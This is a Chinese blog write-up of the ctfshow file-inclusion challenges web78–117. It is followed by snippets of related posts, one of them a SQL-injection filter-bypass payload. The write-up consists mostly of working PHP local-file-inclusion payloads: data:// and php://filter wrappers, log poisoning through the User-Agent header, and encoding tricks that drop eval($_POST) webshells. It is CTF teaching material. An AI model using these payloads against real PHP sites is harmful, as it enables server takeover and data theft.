ctfshow 文件包含 web 78 -117

原创 已于 2022-10-06 18:17:09 修改 · 1.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #php #nginx

于 2022-02-27 12:30:57 首次发布
本文探讨了PHP中的编码技巧,如base64编码、url编码,以及如何利用这些技术进行getshell攻击和绕过过滤。涉及的日志文件操作、二次编码技巧和安全防范措施是核心内容。

目录

web 78

data://text/plain,<?php system("cat flag.php");?>
php://filter/convert.base64-encode/resource=flag.php

web 79

file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
//PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system(‘cat flag.php’);

web 80

包含日志文件 进行getshell 日志文件路径: ?file=/var/log/nginx/access.log
我们抓个包就可以知道它的服务类型为nginx
在这里插入图片描述

然后在user-agent写shell
在这里插入图片描述

web 81

同上

web 82-86(环境暂时做不了)

web 87

因为它对php,:,data进行了过滤,并进行了url解码
我们可以对php://filter/write=convert.base64-decode/resource=1.php(把内容写进1.php)进行url二次编码
exp,这个只是第一次url编码然后只要在编码网站再编码一次就行了

<?php
$b='';
$a='php://filter/write=convert.base64-decode/resource=1.php';
$c='%';
for($i=0;$i<strlen($a);$i++)
{
	$b=$b.$c.bin2hex($a[$i]);
}
echo $b;
?>

content可以对<?php eval($_POST[1]);?>进行base64编码,再在前面加个aa,因为base64是以4个字节为一组而前面的phpdie还差两个字节。

只有ASCII码值为43,45-47,65-90,97-122时,才有base64_reverse_table[ch]>=0,对应字符为 +, / , 09,az,A~Z,其余字符都会被跳过
如本题的 <?php die("大佬别秀了");?> 在base64_decode处理的时候可视为phpdie,

web 88

这次构造要注意,要构造一个末尾没有加号或等于号
file=data://text/plain;base64,PD9waHAgaGlnaGxpZ2h0X2ZpbGUoIi4vZmwwZy5waHAiKTsgPz4xYXM
在这里插入图片描述

web 116

用010分离出图片
在这里插入图片描述
然后再分离
file=compress.zlib:///var/www/html/flag.php

web 117

file=php://filter/write=convert.iconv.ucs-2le.ucs-2be/resource=a.php
contents=?<hp pvela$(P_SO[T]1;)>?
//<?php eval($_POST[1]);?>

进入a.php,webshell
CTFshow 文件包含 web117
Kradress的博客
12-12 920
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_ma
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1337
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
ctfshow文件包含web87-117
m0_62207170的博客
06-19 708
ctfshow文件包含web87-117
ctfshow-web入门117(绕过exit头部限制)
qq_44657899的博客
10-27 2123
源码如下: <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_match('/ht
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 975
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1989
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
ctfshow 文件包含漏洞 web78-88 (更新中)
ljc13626678577的博客
07-12 1409
ctfshow文件包含漏洞 以及一些食用干活总结 目前仍在更新中
CTFshow web 入门 web82------web86 文件包含wp
2202_75289892的博客
08-10 825
要编写以下html脚本,进行临时文件上传,上传文件的同时传入一个参数及其值:PHP_SESSION_UPLOAD_PROGRESS=,这样达到恶意代码的上传,进而执行命令。例如在cookie中设置PHPSESSID(即session 的值)=flag,那么会在服务器上创建一个/tmp/sess_flag文件,对于默认配置,文件内容上传后会被清除,那么我们需要进行环境竞争,在删除之前,对该文件进行文件包含,从而进行命令执行。点击开始攻击,由此能不断的上传刚刚的文件,继续尝试在删除前进行文件包含
ctfshow-web-78-88,web116-117-wp
2301_80915592的博客
11-19 923
这里利用什么session包含反序列化,看不懂了,大佬说下面一下脚本解决。直接看上文,换个思路。>,记得去等号,因为等号被过滤。这给要杂项的知识,有点不会啊,反正最后分离出这东东(以后再来,我要迅速学)。我用python脚本得到下面这个,相比上面没有@,但是就是错。然后经历2次url编码,hackbar一次,代码要求一次。看到这里,心里挺感动的,我会加油,努力成为大黑客。这里data,php全被过滤,可以看看此文章。先上2篇文章,相当好,至少现在我不能写这么好。
CTFshow 文件包含Web78-Web117
dasdasdasvsdV的博客
08-04 638
注意用法,allow_url_fopen和allow_url_include都满足的时候才可以用常用场景:文件包含、文本包含。
CTFshow--WEB入门--文件包含78-88、116、117关)
2401_83504183的博客
12-09 3118
说明:本篇文章会不断更新,我是一个新手小白,对这里面的知识都是一边做题一边积累的,所以文章中会有很多关于解题的碎碎念。本篇文章继续通过文件包含的其他关卡,后续的部分会不断更新......
ctfshow-web入门-文件包含web88、web116、web117
Welcome To Myon'Blog !
07-06 2251
没有过滤冒号 : ,可以使用 data 协议,但是过滤了括号和等号,因此需要编码绕过一下。这里有点问题,我 ('ls') 后加上分号发现不行,可能是编码结果有加号,题目做了过滤去掉分号得到 PD9waHAgc3lzdGVtKCdscycpPz4=,传入时要把等号去掉,因为题目过滤掉了等号,否则会触发 die 函数,即使去掉等号,base64 解码也是
ctf.show文件包含(web78-web117)
wanan的博客
08-31 554
ctf.show文件包含(web78-web117)
文件包含&CTFshow78-117
m0_63917373的博客
11-08 778
CTFSHOW 文件包含
CTFshow 文件包含 78-88&116-117
Landasika的博客
05-17 1434
目录 web78web79web80方法一、http://远程包含方法二、include包含日志web81web82-86:条件竞争web87*web88web116web117 web78 if(isset($_GET['file'])){ $file=$_GET['file']; include($file); }else{ highlight_file...
ctfshow 文件包含web78-web81)
m0_62274649的博客
12-16 326
这个题可以用日志包含来做,apache的日志一般是/var/log/apache/access.log。nginx的日志在/var/log/nginx/access.logstep1:把一句话木马加到U-A头里:
CTFSHOW-WEB177关-SQL注入-空格&注释符--+及#被过滤
weixin_63308767的博客
10-24 268
测试方法: 输入1有回显 单引号闭合 根据往常测字段长度,发现报错,那么被过滤的字符就是这里的了 弱比较1后面随便输也有回显 测试过:注释符换#,大小写,字符拼接都无法绕过 经过测试发现空格和注释符被过滤 使用/**/代替空格,%23代替注释符 payload:-1'/**/union/**/select/**/1,2,password/**/from/**/ctfshow_user%23
CTFshow web(SQL注入176-179)
csjjjd的博客
02-20 839
发现回显,那就直接改变数字就好,就会返回不同的字段,这里教大家一招,很好用,把数字设置的很大就可以直接找到flag,不用一个个翻找。经过测试发现/**/被过滤,那就换成反引号就好了。很多形式的空格类型被过滤,但是%0c还可以使用。
ctfshow-web文件包含
m0_72898152的博客
02-06 1008
ctf,ctfshow文件包含
CTFshow-WEB入门-SSTI本地部署
最新发布
03-31
<think>嗯,用户想了解如何本地部署CTFshowWEB入门SSTI题目。首先,我需要回忆一下SSTI(服务器端模板注入)的基本概念,以及CTFshow这类题目的常见设置。可能用户需要搭建一个本地环境,比如使用PHP的Twig或者Python的Flask/Jinja2,具体要看题目用的是哪种模板引擎。 接下来,我需要考虑用户可能使用的技术栈。常见的本地部署可能会用到Docker、XAMPP或者直接配置Apache/Nginx。假设题目是基于PHP的,比如使用Twig模板引擎,那么需要配置PHP环境,并确保模板文件正确解析。记得用户提到的引用[1]提到IIS 6.0下.php后缀的文件会被解析,但这里可能需要Apache或Nginx的配置。例如,在Apache中,确保.htaccess正确设置,或者配置虚拟主机。 然后,用户可能需要修改题目中的一些配置,比如路由设置或者服务端代码。引用[2]提到servlet-class和url-pattern,这涉及到Java Web应用的配置,但如果题目是PHP或Python的,可能需要不同的配置方法。比如在Flask中,路由是通过装饰器定义的,而在PHP中可能需要修改.htaccess文件或服务器配置。 另外,安全设置也是需要考虑的,比如禁用危险函数,或者设置合适的权限,防止本地环境被恶意利用。用户可能还需要安装相关的依赖库,比如Composer安装Twig,或者pip安装Flask。 可能遇到的问题包括:服务器配置错误导致模板不解析,依赖未安装,路由设置不正确导致无法访问题目页面。需要逐步检查环境配置,确保每一步都正确。比如,检查PHP版本是否兼容,模板引擎是否正确加载,以及文件权限是否正确。 最后,生成相关问题时要考虑用户可能进一步的需求,比如如何调试SSTI漏洞,或者如何搭建其他类型的CTF题目环境,以及安全注意事项。需要确保回答清晰,步骤详细,并引用相关的参考资料来增强可信度。</think>### CTFshow WEB入门SSTI题目本地部署教程 #### 一、环境准备 1. **Web服务器选择**:推荐使用Apache或Nginx,需支持PHP/Python解析(根据题目具体语言) - 若使用PHP环境,建议安装PHP 7.x + Apache组合[^1] - 示例Apache配置: ```apache <VirtualHost *:80> DocumentRoot "/var/www/ssti" <Directory "/var/www/ssti"> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> </VirtualHost> ``` 2. **模板引擎安装**: - 对于PHP Twig模板: ```bash composer require twig/twig ``` - 对于Python Flask/Jinja2: ```bash pip install flask ``` #### 二、题目部署步骤 1. **代码结构调整**: ```text 项目目录/ ├── templates/ │ └── index.html ├── index.php # 或app.py └── vendor/ # PHP依赖目录 ``` 2. **核心路由配置**(以PHP为例): ```php <?php require_once 'vendor/autoload.php'; $loader = new \Twig\Loader\FilesystemLoader('templates'); $twig = new \Twig\Environment($loader); $template = $twig->load('index.html'); echo $template->render($_GET); ``` 3. **安全限制解除**(调试需要): -php.ini中设置: ```ini disable_functions = allow_url_include = On ``` #### 三、访问验证 1. 启动Apache服务: ```bash sudo systemctl start apache2 ``` 2. 访问测试: ```bash curl http://localhost/?payload={{7*7}} # 应返回计算结果49 ``` #### 四、常见问题排查 1. **模板不解析**: - 检查文件权限:`chmod -R 755 templates/` - 验证Twig初始化是否正确 - 查看Apache错误日志:`tail -f /var/log/apache2/error.log` 2. **依赖缺失**: - PHP需安装mbstring扩展 - Python需安装Jinja2最新版
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值